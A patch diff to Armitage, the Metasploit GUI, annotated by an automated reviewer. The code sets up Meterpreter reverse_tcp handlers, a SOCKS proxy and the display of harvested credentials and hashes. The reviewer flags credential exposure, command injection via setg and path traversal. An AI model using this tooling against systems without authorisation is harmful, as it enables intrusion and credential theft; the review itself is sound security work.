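Review bot: the final line of this new batch file passes the RPC credentials as arguments (-U $$USER$$ -P $$PASS$$), so the password is readable by any local account that can list process command lines for as long as msfrpcd runs, and -S disables SSL on the RPC socket. Binding to 127.0.0.1 limits network exposure but not local exposure; document that trade-off in a comment, or take the password from a file or the environment if msfrpcd allows it. Separately, set JAVA_HOME="%BASE%java" and set MSF_DATABASE_CONFIG="..." store the quote characters as part of the value; the form set "JAVA_HOME=%BASE%java" avoids that. cd "%BASE%" also needs /d to work when BASE is on a different drive.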
@ -42,8 +42,13 @@ sub c_client {
|
|||
sub setupHandlers {
|
||||
find_job("Exploit: multi/handler", {
|
||||
if ($1 == -1) {
|
||||
# set LPORT for the user...
|
||||
local('$c');
|
||||
$c = call($client, "console.allocate")['id'];
|
||||
call($client, "console.write", $c, "setg LPORT " . randomPort() . "\n");
|
||||
call($client, "console.release", $c);
|
||||
|
||||
# setup a handler for meterpreter
|
||||
call($client, "core.setg", "LPORT", randomPort());
|
||||
call($client, "module.execute", "exploit", "multi/handler", %(
|
||||
PAYLOAD => "windows/meterpreter/reverse_tcp",
|
||||
LHOST => "0.0.0.0",
|
||||
|
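Review bot: in setupHandlers, the console.write of "setg LPORT ..." is followed immediately by console.release with no console.read in between, so nothing confirms the console processed the command before module.execute starts multi/handler. The id returned by console.allocate is also used without checking that the call succeeded. Read until the "LPORT => " echo comes back before releasing the console, and bail out if allocation fails.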
@ -55,7 +60,7 @@ sub setupHandlers {
|
|||
|
||||
sub main {
|
||||
global('$client $mclient');
|
||||
local('%r $exception');
|
||||
local('%r $exception $lhost $temp $c');
|
||||
|
||||
setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L);
|
||||
|
||||
|
@ -81,8 +86,24 @@ sub main {
|
|||
# setup second thread.
|
||||
%r = call($client, "armitage.validate", $user, $pass, $null, "armitage", 120326);
|
||||
|
||||
# resolve lhost..
|
||||
$c = call($client, "console.allocate")['id'];
|
||||
call($client, "console.write", $c, "setg LHOST\n");
|
||||
while ($lhost eq "") {
|
||||
$temp = call($client, "console.read", $c)['data'];
|
||||
if (["$temp" startsWith: "LHOST => "]) {
|
||||
$lhost = substr(["$temp" trim], 9);
|
||||
}
|
||||
else {
|
||||
# this shouldn't happen because having LHOST set is a precondition
|
||||
# for Cortana to connect to a team server.
|
||||
sleep(1000);
|
||||
}
|
||||
}
|
||||
call($client, "console.release", $c);
|
||||
|
||||
# pass some objects back yo.
|
||||
[$loader passObjects: $client, $mclient];
|
||||
[$loader passObjects: $client, $mclient, $lhost];
|
||||
|
||||
# don't make previous messages available...
|
||||
call($mclient, "armitage.skip");
|
||||
|
|
|
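Review bot: the while ($lhost eq "") loop that resolves LHOST has no exit condition other than success, so a team server that never echoes "LHOST => " leaves main spinning in one-second sleeps forever. The comment says this should not happen, which is the reason to fail loudly instead: cap the number of reads and report an error when the cap is hit. The startsWith test is also applied to the whole console.read chunk, so any banner or other output arriving in the same read hides the line; split $temp into lines and test each one.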
@ -9,7 +9,10 @@ import msf.*;
|
|||
|
||||
# setg("varname", "value")
|
||||
sub setg {
|
||||
call_async("core.setg", $1, $2);
|
||||
if ($1 eq "LHOST") {
|
||||
call_async("armitage.set_ip", $2);
|
||||
}
|
||||
cmd_safe("setg $1 $2");
|
||||
}
|
||||
|
||||
sub readg {
|
||||
|
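Review bot: in setg, cmd_safe("setg $1 $2") builds a console command by interpolating both arguments into one string, where the core.setg RPC call listed in this hunk passes them as separate parameters. A value containing a space is truncated at the first word, and a value containing a newline becomes a second console command. Reject or strip newlines in $1 and $2 before building the string, and state in the function comment that values with spaces are not supported, or keep the RPC call for the value and use the console only where it is required.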
@ -335,14 +338,22 @@ sub multi_handler {
|
|||
}
|
||||
|
||||
sub handler {
|
||||
local('%o $3');
|
||||
local('%o $3 $key $value');
|
||||
|
||||
# default options
|
||||
%o['PAYLOAD'] = $1;
|
||||
%o['LPORT'] = $2;
|
||||
%o['DisablePayloadHandler'] = 'false';
|
||||
%o['ExitOnSession'] = 'false';
|
||||
|
||||
# let the user override anything
|
||||
if ($3) {
|
||||
%o = copy($3);
|
||||
foreach $key => $value ($3) {
|
||||
%o[$key] = $value;
|
||||
}
|
||||
}
|
||||
|
||||
%o['PAYLOAD'] = "payload/ $+ $1";
|
||||
%o['LPORT'] = $2;
|
||||
|
||||
# make sure LHOST is correct
|
||||
if ('LHOST' !in %o) {
|
||||
if ("*http*" iswm $1) {
|
||||
%o['LHOST'] = lhost();
|
||||
|
@ -352,6 +363,7 @@ sub handler {
|
|||
}
|
||||
}
|
||||
|
||||
# let's do it...
|
||||
return launch('exploit', 'multi/handler', %o);
|
||||
}
|
||||
|
||||
|
|
|
@ -15,7 +15,7 @@ import graph.*;
|
|||
|
||||
import java.awt.image.*;
|
||||
|
||||
global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS');
|
||||
global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS $DESCRIBE @CLOSEME');
|
||||
|
||||
sub describeHost {
|
||||
local('$desc');
|
||||
|
@ -59,7 +59,7 @@ sub showHost {
|
|||
else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) {
|
||||
push(@overlay, 'resources/windowsxp.png');
|
||||
}
|
||||
else if ("*8*" iswm $match) {
|
||||
else if ("*8*" iswm $match && "*2008*" !iswm $match) {
|
||||
push(@overlay, 'resources/windows8.png');
|
||||
}
|
||||
else {
|
||||
|
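Review bot: in showHost, the condition "*8*" iswm $match && "*2008*" !iswm $match still selects the Windows 8 icon for any OS string that contains the digit 8 anywhere, such as a build number or "98"; excluding 2008 patches one false match only. Match on the product name instead, for example "*Windows 8*" iswm $match, and keep the 2008 exclusion only if that pattern still needs it.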
@ -139,7 +139,7 @@ sub _connectToMetasploit {
|
|||
$progress = [new ProgressMonitor: $null, "Connecting to $1 $+ : $+ $2", "first try... wish me luck.", 0, 100];
|
||||
|
||||
# keep track of whether we're connected to a local or remote Metasploit instance. This will affect what we expose.
|
||||
$REMOTE = iff($1 eq "127.0.0.1", $null, 1);
|
||||
$REMOTE = iff($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost", $null, 1);
|
||||
|
||||
$flag = 10;
|
||||
while ($flag) {
|
||||
|
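Review bot: $REMOTE is decided by comparing $1 against three literal strings, and the comment above it says the result controls what gets exposed. Other spellings of the loopback address (another 127.0.0.0/8 address, an upper-case "LOCALHOST", the long form of ::1) are classified as remote. Resolving $1 and asking the resulting address whether it is loopback would cover all of them in one check.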
@ -160,11 +160,12 @@ sub _connectToMetasploit {
|
|||
}
|
||||
|
||||
# connecting locally? go to Metasploit directly...
|
||||
if ($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost") {
|
||||
if ($REMOTE is $null) {
|
||||
$client = [new MsgRpcImpl: $3, $4, $1, long($2), $null, $debug];
|
||||
$aclient = [new RpcAsync: $client];
|
||||
$mclient = $client;
|
||||
initConsolePool();
|
||||
$DESCRIBE = "localhost";
|
||||
}
|
||||
# we have a team server... connect and authenticate to it.
|
||||
else {
|
||||
|
@ -172,6 +173,11 @@ sub _connectToMetasploit {
|
|||
setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L);
|
||||
$mclient = setup_collaboration($3, $4, $1, $2);
|
||||
$aclient = $mclient;
|
||||
|
||||
if ($mclient is $null) {
|
||||
[$progress close];
|
||||
return;
|
||||
}
|
||||
}
|
||||
$flag = $null;
|
||||
}
|
||||
|
@ -239,10 +245,6 @@ sub _connectToMetasploit {
|
|||
[$progress setNote: "Connected: ..."];
|
||||
[$progress setProgress: 60];
|
||||
|
||||
if (!$REMOTE && %MSF_GLOBAL['ARMITAGE_TEAM'] eq '1') {
|
||||
showErrorAndQuit("Do not connect to 127.0.0.1 when\nrunning a team server.");
|
||||
}
|
||||
|
||||
dispatchEvent(&postSetup);
|
||||
}, \$progress));
|
||||
}
|
||||
|
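Review bot: the block that stops with "Do not connect to 127.0.0.1 when\nrunning a team server." appears in this hunk while the header shrinks it from 10 lines to 6, so the guard is being dropped and nothing in the hunk replaces it. If connecting directly to a Metasploit instance that is serving a team is now supported, say so in the commit message; if not, keep the check so the client cannot bypass the team server's state.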
@ -323,28 +325,23 @@ sub postSetup {
|
|||
}
|
||||
|
||||
sub main {
|
||||
local('$console $panel $dir');
|
||||
local('$console $panel $dir $app');
|
||||
|
||||
$frame = [new ArmitageApplication];
|
||||
$frame = [new ArmitageApplication: $__frame__, $DESCRIBE, $mclient];
|
||||
[$frame setTitle: $TITLE];
|
||||
[$frame setSize: 800, 600];
|
||||
|
||||
[$frame setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]];
|
||||
init_menus($frame);
|
||||
initLogSystem();
|
||||
|
||||
[$frame setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]];
|
||||
[$frame show];
|
||||
[$frame setExtendedState: [JFrame MAXIMIZED_BOTH]];
|
||||
|
||||
# this window listener is dead-lock waiting to happen. That's why we're adding it in a
|
||||
# separate thread (Sleep threads don't share data/locks).
|
||||
fork({
|
||||
[$frame addWindowListener: {
|
||||
[$__frame__ addWindowListener: {
|
||||
if ($0 eq "windowClosing" && $msfrpc_handle !is $null) {
|
||||
closef($msfrpc_handle);
|
||||
}
|
||||
}];
|
||||
}, \$msfrpc_handle, \$frame);
|
||||
}, \$msfrpc_handle, \$__frame__);
|
||||
|
||||
dispatchEvent({
|
||||
if ($client !is $mclient) {
|
||||
|
@ -375,7 +372,6 @@ sub checkDir {
|
|||
}
|
||||
}
|
||||
|
||||
setLookAndFeel();
|
||||
checkDir();
|
||||
|
||||
if ($CLIENT_CONFIG !is $null && -exists $CLIENT_CONFIG) {
|
||||
|
|
|
@ -679,12 +679,20 @@ sub addFileListener {
|
|||
$actions["SigningCert"] = $actions["*FILE*"];
|
||||
$actions["SigningKey"] = $actions["*FILE*"];
|
||||
$actions["Wordlist"] = $actions["*FILE*"];
|
||||
$actions["EXE::Custom"] = $actions["*FILE*"];
|
||||
$actions["EXE::Template"] = $actions["*FILE*"];
|
||||
$actions["WORDLIST"] = $actions["*FILE*"];
|
||||
$actions["REXE"] = $actions["*FILE*"];
|
||||
|
||||
# set up an action to choose a session
|
||||
$actions["SESSION"] = lambda(&chooseSession);
|
||||
|
||||
# helpers to set credential pairs from database... yay?
|
||||
$actions["USERNAME"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD");
|
||||
$actions["PASSWORD"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD");
|
||||
$actions["SMBUser"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass");
|
||||
$actions["SMBPass"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass");
|
||||
|
||||
# set up an action to pop up a file chooser for different file type values.
|
||||
$actions["RHOST"] = {
|
||||
local('$title $temp');
|
||||
|
|
|
@ -23,6 +23,7 @@ sub createEventLogTab {
|
|||
$client = [$cortana getEventLog: $console];
|
||||
[$client setEcho: $null];
|
||||
[$console updatePrompt: "> "];
|
||||
[new EventLogTabCompletion: $console, $mclient];
|
||||
}
|
||||
else {
|
||||
[$console updateProperties: $preferences];
|
||||
|
@ -63,6 +64,7 @@ sub c_client {
|
|||
# run this thing in its own thread to avoid really stupid deadlock situations
|
||||
local('$handle');
|
||||
$handle = [[new SecureSocket: $1, int($2), &verify_server] client];
|
||||
push(@CLOSEME, $handle);
|
||||
return wait(fork({
|
||||
local('$client');
|
||||
$client = newInstance(^RpcConnection, lambda({
|
||||
|
@ -91,9 +93,11 @@ sub setup_collaboration {
|
|||
%r = call($mclient, "armitage.validate", $1, $2, $nick, "armitage", 120326);
|
||||
if (%r["error"] eq "1") {
|
||||
showErrorAndQuit(%r["message"]);
|
||||
return $null;
|
||||
}
|
||||
|
||||
%r = call($client, "armitage.validate", $1, $2, $null, "armitage", 120326);
|
||||
$DESCRIBE = "$nick $+ @ $+ $3";
|
||||
return $mclient;
|
||||
}
|
||||
|
||||
|
|
|
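Review bot: the second armitage.validate call, the one on $client, stores its result in %r but %r["error"] is never checked before $DESCRIBE is set and $mclient is returned; only the $mclient call is checked. Add the same error check or a comment saying why a failure here can be ignored. The literal 120326 is also repeated in both calls; a named constant would keep them in step.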
@ -95,13 +95,13 @@ sub dispatchEvent {
|
|||
|
||||
sub showError {
|
||||
dispatchEvent(lambda({
|
||||
[JOptionPane showMessageDialog: $frame, $message];
|
||||
[JOptionPane showMessageDialog: $__frame__, $message];
|
||||
}, $message => $1));
|
||||
}
|
||||
|
||||
sub showErrorAndQuit {
|
||||
[JOptionPane showMessageDialog: $frame, $1];
|
||||
[System exit: 0];
|
||||
[JOptionPane showMessageDialog: $__frame__, $1];
|
||||
[$__frame__ closeConnect];
|
||||
}
|
||||
|
||||
sub ask {
|
||||
|
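Review bot: showErrorAndQuit now ends with [$__frame__ closeConnect] where the other version of the body calls [System exit: 0], so it returns to its caller instead of terminating. Every call site needs an explicit return after it (setup_collaboration gets one in this patch), and the name no longer matches the behaviour. connectDialog guards with if ($__frame__ && ...), which suggests $__frame__ can be null; the same guard is missing in showError and showErrorAndQuit.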
@ -155,7 +155,7 @@ sub chooseFile {
|
|||
[$fc setFileSelectionMode: [JFileChooser DIRECTORIES_ONLY]];
|
||||
}
|
||||
|
||||
[$fc showOpenDialog: $frame];
|
||||
[$fc showOpenDialog: $__frame__];
|
||||
|
||||
if ($multi) {
|
||||
return [$fc getSelectedFiles];
|
||||
|
@ -179,17 +179,18 @@ sub saveFile2 {
|
|||
[$fc setSelectedFile: [new java.io.File: $sel]];
|
||||
}
|
||||
|
||||
[$fc showSaveDialog: $frame];
|
||||
$file = [$fc getSelectedFile];
|
||||
if ($file !is $null) {
|
||||
return $file;
|
||||
if ([$fc showSaveDialog: $__frame__] == 0) {
|
||||
$file = [$fc getSelectedFile];
|
||||
if ($file !is $null) {
|
||||
return $file;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
sub saveFile {
|
||||
local('$fc $file');
|
||||
$fc = [new JFileChooser];
|
||||
[$fc showSaveDialog: $frame];
|
||||
[$fc showSaveDialog: $__frame__];
|
||||
$file = [$fc getSelectedFile];
|
||||
if ($file !is $null) {
|
||||
local('$ihandle $data $ohandle');
|
||||
|
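Review bot: saveFile2 now returns a file only when showSaveDialog returns 0, but saveFile in the same hunk still ignores the return value and reads getSelectedFile regardless, so a file highlighted before Cancel may still be used there. Apply the same check to saveFile, and compare against [JFileChooser APPROVE_OPTION] rather than the literal 0.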
@ -250,10 +251,10 @@ sub left {
|
|||
|
||||
sub dialog {
|
||||
local('$dialog $4');
|
||||
$dialog = [new JDialog: $frame, $1];
|
||||
$dialog = [new JDialog: $__frame__, $1];
|
||||
[$dialog setSize: $2, $3];
|
||||
[$dialog setLayout: [new BorderLayout]];
|
||||
[$dialog setLocationRelativeTo: $frame];
|
||||
[$dialog setLocationRelativeTo: $__frame__];
|
||||
return $dialog;
|
||||
}
|
||||
|
||||
|
@ -261,7 +262,15 @@ sub window {
|
|||
local('$dialog $4');
|
||||
$dialog = [new JFrame: $1];
|
||||
[$dialog setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]];
|
||||
[$dialog setDefaultCloseOperation: [JFrame EXIT_ON_CLOSE]];
|
||||
|
||||
fork({
|
||||
[$dialog addWindowListener: {
|
||||
if ($0 eq "windowClosing") {
|
||||
[$__frame__ closeConnect];
|
||||
}
|
||||
}];
|
||||
}, \$__frame__, \$dialog);
|
||||
|
||||
[$dialog setSize: $2, $3];
|
||||
[$dialog setLayout: [new BorderLayout]];
|
||||
return $dialog;
|
||||
|
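Review bot: [$dialog setDefaultCloseOperation: [JFrame EXIT_ON_CLOSE]] is still in place next to the new windowClosing listener, so closing this window still exits the whole JVM after [$__frame__ closeConnect] runs. If the listener is meant to close only this connection, the default close operation has to change as well. The listener also dereferences $__frame__ without the null check that connectDialog uses, and the reason for registering it inside fork() deserves a comment.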
@ -277,12 +286,14 @@ sub overlay_images {
|
|||
return %cache[join(';', $1)];
|
||||
}
|
||||
|
||||
local('$file $image $buffered $graphics');
|
||||
local('$file $image $buffered $graphics $resource');
|
||||
|
||||
$buffered = [new BufferedImage: 1000, 776, [BufferedImage TYPE_INT_ARGB]];
|
||||
$graphics = [$buffered createGraphics];
|
||||
foreach $file ($1) {
|
||||
$image = [ImageIO read: resource($file)];
|
||||
$resource = resource($file);
|
||||
$image = [ImageIO read: $resource];
|
||||
closef($resource);
|
||||
[$graphics drawImage: $image, 0, 0, 1000, 776, $null];
|
||||
}
|
||||
|
||||
|
@ -371,15 +382,6 @@ sub wrapComponent {
|
|||
return $panel;
|
||||
}
|
||||
|
||||
sub setLookAndFeel {
|
||||
local('$laf');
|
||||
foreach $laf ([UIManager getInstalledLookAndFeels]) {
|
||||
if ([$laf getName] eq [$preferences getProperty: "application.skin.skin", "Nimbus"]) {
|
||||
[UIManager setLookAndFeel: [$laf getClassName]];
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
sub thread {
|
||||
local('$thread');
|
||||
$thread = [new ArmitageThread: $1];
|
||||
|
@ -446,7 +448,7 @@ sub quickListDialog {
|
|||
|
||||
$button = [new JButton: $2];
|
||||
[$button addActionListener: lambda({
|
||||
[$callback : [$model getSelectedValueFromColumn: $table, $lead]];
|
||||
[$callback : [$model getSelectedValueFromColumn: $table, $lead], $table, $model];
|
||||
[$dialog setVisible: 0];
|
||||
}, \$dialog, $callback => $5, \$model, \$table, $lead => $3[0])];
|
||||
|
||||
|
@ -467,6 +469,13 @@ sub quickListDialog {
|
|||
[$dialog setVisible: 1];
|
||||
}
|
||||
|
||||
sub setTableColumnWidths {
|
||||
local('$col $width $temp');
|
||||
foreach $col => $width ($2) {
|
||||
[[$1 getColumn: $col] setPreferredWidth: $width];
|
||||
}
|
||||
}
|
||||
|
||||
sub tableRenderer {
|
||||
return [ATable getDefaultTableRenderer: $1, $2];
|
||||
}
|
||||
|
|
|
@ -8,10 +8,10 @@ import java.awt.event.*;
|
|||
|
||||
sub addHostDialog {
|
||||
local('$dialog $label $text $finish $button');
|
||||
$dialog = [new JDialog: $frame, "Add Hosts", 0];
|
||||
$dialog = [new JDialog: $__frame__, "Add Hosts", 0];
|
||||
[$dialog setSize: 320, 240];
|
||||
[$dialog setLayout: [new BorderLayout]];
|
||||
[$dialog setLocationRelativeTo: $frame];
|
||||
[$dialog setLocationRelativeTo: $__frame__];
|
||||
|
||||
$label = [new JLabel: "Enter one host/line:"];
|
||||
$text = [new JTextArea];
|
||||
|
|
|
@ -16,47 +16,7 @@ import java.awt.event.*;
|
|||
import ui.*;
|
||||
|
||||
sub manage_proxy_server {
|
||||
manage_job("Auxiliary: server/socks4a",
|
||||
# start server function
|
||||
{
|
||||
launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", $null);
|
||||
},
|
||||
# description of job (for job kill function)
|
||||
{
|
||||
local('$host $port');
|
||||
($host, $port) = values($2["datastore"], @("SRVHOST", "SRVPORT"));
|
||||
return "SOCKS proxy is running on $host $+ : $+ $port $+ .\nWould you like to stop it?";
|
||||
}
|
||||
);
|
||||
|
||||
}
|
||||
|
||||
sub report_url {
|
||||
find_job($name, {
|
||||
if ($1 == -1) {
|
||||
showError("Server not found");
|
||||
}
|
||||
else {
|
||||
local('$job $host $port $uripath');
|
||||
$job = call($client, "job.info", $1);
|
||||
|
||||
($host, $port) = values($job["info"]["datastore"], @("SRVHOST", "SRVPORT"));
|
||||
$uripath = $job["info"]["uripath"];
|
||||
|
||||
local('$dialog $text $ok');
|
||||
$dialog = dialog("Output", 320, 240);
|
||||
$text = [new JTextArea];
|
||||
[$text setText: "http:// $+ $host $+ : $+ $port $+ $uripath"];
|
||||
|
||||
$button = [new JButton: "Ok"];
|
||||
[$button addActionListener: lambda({ [$dialog setVisible: 0]; }, \$dialog)];
|
||||
|
||||
[$dialog add: [new JScrollPane: $text], [BorderLayout CENTER]];
|
||||
[$dialog add: center($button), [BorderLayout SOUTH]];
|
||||
|
||||
[$dialog setVisible: 1];
|
||||
}
|
||||
});
|
||||
launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", 1);
|
||||
}
|
||||
|
||||
sub find_job {
|
||||
|
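Review bot: manage_proxy_server now calls launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", 1), where the start function in the longer version passes $null as the fourth argument; nothing here says what 1 means. With the manage_job wrapper gone from this function there is also no visible path that finds a running socks4a job and offers to stop it, so confirm that stopping the proxy is still reachable from the UI.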
@ -80,26 +40,6 @@ sub find_job {
|
|||
}, $name => $1, $function => $2));
|
||||
}
|
||||
|
||||
# manage_job(job name, { start job function }, { job dialog info })
|
||||
sub manage_job {
|
||||
local('$name $startf $stopf');
|
||||
($name, $startf, $stopf) = @_;
|
||||
|
||||
find_job($name, lambda({
|
||||
if ($1 == -1) {
|
||||
[$startf];
|
||||
}
|
||||
else {
|
||||
local('$job $confirm $foo $confirm');
|
||||
$job = call($client, "job.info", $1);
|
||||
$confirm = askYesNo([$stopf : $1, $job], "Stop Job");
|
||||
if ($confirm eq "0") {
|
||||
call_async($client, "job.stop", $1);
|
||||
}
|
||||
}
|
||||
}, \$startf, \$stopf));
|
||||
}
|
||||
|
||||
sub generatePayload {
|
||||
local('$file');
|
||||
$file = saveFile2();
|
||||
|
@ -450,6 +390,11 @@ sub _launch_dialog {
|
|||
elog("launched DNS enum for $domain");
|
||||
}
|
||||
}
|
||||
else if ($type eq "auxiliary" && $command eq "server/socks4a") {
|
||||
local('$host $port');
|
||||
($host, $port) = values($options, @('SRVHOST', 'SRVPORT'));
|
||||
elog("started SOCKS proxy server at $host $+ : $+ $port");
|
||||
}
|
||||
|
||||
launch_service($title, "$type $+ / $+ $command", $options, $type, $format => [$combo getSelectedItem]);
|
||||
}
|
||||
|
|
|
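Review bot: the new server/socks4a branch calls elog("started SOCKS proxy server at ...") before launch_service runs, so the shared event log records a start even when the launch fails or the options are rejected. Log after the service is confirmed, or word the entry as a launch request.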
@ -15,8 +15,8 @@ sub logNow {
|
|||
if ([$preferences getProperty: "armitage.log_everything.boolean", "true"] eq "true") {
|
||||
local('$today $stream');
|
||||
$today = formatDate("yyMMdd");
|
||||
mkdir(getFileProper(dataDirectory(), $today, $2));
|
||||
$stream = %logs[ getFileProper(dataDirectory(), $today, $2, "$1 $+ .log") ];
|
||||
mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2));
|
||||
$stream = %logs[ getFileProper(dataDirectory(), $today, $DESCRIBE, $2, "$1 $+ .log") ];
|
||||
[$stream println: $3];
|
||||
}
|
||||
}
|
||||
|
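Review bot: $DESCRIBE is inserted as a directory component in both getFileProper calls, and the only assignment visible in this patch is "$nick $+ @ $+ $3" in setup_collaboration, built from a user-chosen nickname and a host string. Strip or reject path separators and ".." before using it in a path, and define its value for connections that do not go through setup_collaboration. The same applies to the logCheck, logFile and _generateArtifacts hunks.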
@ -26,8 +26,8 @@ sub logCheck {
|
|||
local('$today');
|
||||
$today = formatDate("yyMMdd");
|
||||
if ($2 ne "") {
|
||||
mkdir(getFileProper(dataDirectory(), $today, $2));
|
||||
[$1 writeToLog: %logs[ getFileProper(dataDirectory(), $today, $2, "$3 $+ .log") ]];
|
||||
mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2));
|
||||
[$1 writeToLog: %logs[ getFileProper(dataDirectory(), $today, $DESCRIBE, $2, "$3 $+ .log") ]];
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -38,7 +38,7 @@ sub logFile {
|
|||
local('$today $handle $data $out');
|
||||
$today = formatDate("yyMMdd");
|
||||
if (-exists $1 && -canread $1) {
|
||||
mkdir(getFileProper(dataDirectory(), $today, $2, $3));
|
||||
mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2, $3));
|
||||
|
||||
# read in the file
|
||||
$handle = openf($1);
|
||||
|
@ -46,7 +46,7 @@ sub logFile {
|
|||
closef($handle);
|
||||
|
||||
# write it out.
|
||||
$out = getFileProper(dataDirectory(), $today, $2, $3, getFileName($1));
|
||||
$out = getFileProper(dataDirectory(), $today, $DESCRIBE, $2, $3, getFileName($1));
|
||||
$handle = openf("> $+ $out");
|
||||
writeb($handle, $data);
|
||||
closef($handle);
|
||||
|
@ -70,7 +70,7 @@ sub initLogSystem {
|
|||
logFile([$file getAbsolutePath], "screenshots", ".");
|
||||
deleteFile([$file getAbsolutePath]);
|
||||
|
||||
showError("Saved " . getFileName($file) . "\nGo to View -> Reporting -> Activity Logs\n\nThe file is in:\n[today's date]/screenshots");
|
||||
showError("Saved " . getFileName($file) . "\nGo to View -> Reporting -> Activity Logs\n\nThe file is in:\n[today's date]/ $+ $DESCRIBE $+ /screenshots");
|
||||
}, \$image, \$title));
|
||||
}];
|
||||
}
|
||||
|
|
|
@ -54,6 +54,29 @@ sub host_selected_items {
|
|||
item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista"));
|
||||
item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8"));
|
||||
|
||||
item($h, "Set Label...", 'S', lambda({
|
||||
# calculate preexisting label to prompt with
|
||||
local('$label %l $host');
|
||||
|
||||
# get a label
|
||||
foreach $host ($hosts) {
|
||||
if ($label eq "") {
|
||||
$label = getHostLabel($host);
|
||||
}
|
||||
}
|
||||
|
||||
# ask for a label
|
||||
$label = ask("Set label to:", $label);
|
||||
if ($label !is $null) {
|
||||
foreach $host ($hosts) {
|
||||
%l[$host] = ["$label" trim];
|
||||
}
|
||||
call_async($mclient, "db.report_labels", %l);
|
||||
}
|
||||
}, $hosts => $2));
|
||||
|
||||
separator($h);
|
||||
|
||||
item($h, "Remove Host", 'R', clearHostFunction($2));
|
||||
}
|
||||
|
||||
|
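Review bot: in the Set Label action the "get a label" loop keeps iterating over $hosts after $label has been found, and ["$label" trim] is recomputed for every host in the second loop. Break out once a label is found and trim once before the loop. A comment should also say that submitting an empty string is how a label is cleared, since the on hosts change later in this patch depends on that case.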
@ -96,10 +119,13 @@ sub view_items {
|
|||
sub armitage_items {
|
||||
local('$m');
|
||||
|
||||
item($1, 'Preferences', 'P', &createPreferencesTab);
|
||||
|
||||
item($1, 'New Connection', 'N', {
|
||||
[new armitage.ArmitageMain: cast(@ARGV, ^String), $__frame__, $null];
|
||||
});
|
||||
separator($1);
|
||||
|
||||
item($1, 'Preferences', 'P', &createPreferencesTab);
|
||||
|
||||
dynmenu($1, 'Set Target View', 'S', {
|
||||
local('$t1 $t2');
|
||||
if ([$preferences getProperty: "armitage.string.target_view", "graph"] eq "graph") {
|
||||
|
@ -160,12 +186,13 @@ sub armitage_items {
|
|||
|
||||
separator($1);
|
||||
|
||||
item($1, 'Exit', 'x', {
|
||||
item($1, 'Close', 'C', {
|
||||
if ($msfrpc_handle !is $null) {
|
||||
closef($msfrpc_handle);
|
||||
}
|
||||
|
||||
[System exit: 0];
|
||||
map({ closef($1); }, @CLOSEME);
|
||||
[$__frame__ quit];
|
||||
});
|
||||
|
||||
}
|
||||
|
@ -223,7 +250,7 @@ sub help_items {
|
|||
|
||||
[$dialog add: $label, [BorderLayout CENTER]];
|
||||
[$dialog pack];
|
||||
[$dialog setLocationRelativeTo: $null];
|
||||
[$dialog setLocationRelativeTo: $__frame__];
|
||||
[$dialog setVisible: 1];
|
||||
});
|
||||
}
|
||||
|
|
|
@ -58,12 +58,38 @@ import ui.*;
|
|||
sub refreshCredsTable {
|
||||
thread(lambda({
|
||||
[Thread yield];
|
||||
local('$creds $cred');
|
||||
local('$creds $cred $desc $aclient %check $key');
|
||||
[$model clear: 128];
|
||||
$creds = call($mclient, "db.creds2", [new HashMap])["creds2"];
|
||||
foreach $desc => $aclient (convertAll([$__frame__ getClients])) {
|
||||
$creds = call($aclient, "db.creds2", [new HashMap])["creds2"];
|
||||
foreach $cred ($creds) {
|
||||
$key = join("~~", values($cred, @("user", "pass", "host")));
|
||||
if ($key in %check) {
|
||||
|
||||
}
|
||||
else if ($title ne "login" || $cred['ptype'] ne "smb_hash") {
|
||||
[$model addEntry: $cred];
|
||||
%check[$key] = 1;
|
||||
}
|
||||
}
|
||||
}
|
||||
[$model fireListeners];
|
||||
}, $model => $1, $title => $2));
|
||||
}
|
||||
|
||||
sub refreshCredsTableLocal {
|
||||
thread(lambda({
|
||||
[Thread yield];
|
||||
local('$creds $cred $desc $aclient %check $key');
|
||||
[$model clear: 128];
|
||||
$creds = call($client, "db.creds2", [new HashMap])["creds2"];
|
||||
foreach $cred ($creds) {
|
||||
if ($title ne "login" || $cred['ptype'] ne "smb_hash") {
|
||||
$key = join("~~", values($cred, @("user", "pass", "host")));
|
||||
if ($key in %check) {
|
||||
}
|
||||
else if ($title ne "login" || $cred['ptype'] ne "smb_hash") {
|
||||
[$model addEntry: $cred];
|
||||
%check[$key] = 1;
|
||||
}
|
||||
}
|
||||
[$model fireListeners];
|
||||
|
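Review bot: the dedup branch if ($key in %check) { } is empty, and refreshCredsTable and refreshCredsTableLocal now carry the same loop body; refreshCredsTableLocal also declares $desc and $aclient without using them. Invert the test to drop the empty branch and move the shared loop into one helper that takes the client as a parameter. The key join("~~", ...) collides when a user, pass or host value itself contains "~~", and $desc is never used in refreshCredsTable, so the merged table cannot show which connection a credential came from.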
@ -71,7 +97,7 @@ sub refreshCredsTable {
|
|||
}
|
||||
|
||||
sub show_hashes {
|
||||
local('$dialog $model $table $sorter $o $user $pass $button $reverse $domain $scroll');
|
||||
local('$dialog $model $table $sorter $o $user $pass $button $reverse $domain $scroll $3');
|
||||
|
||||
$dialog = dialog($1, 480, $2);
|
||||
|
||||
|
@ -83,7 +109,12 @@ sub show_hashes {
|
|||
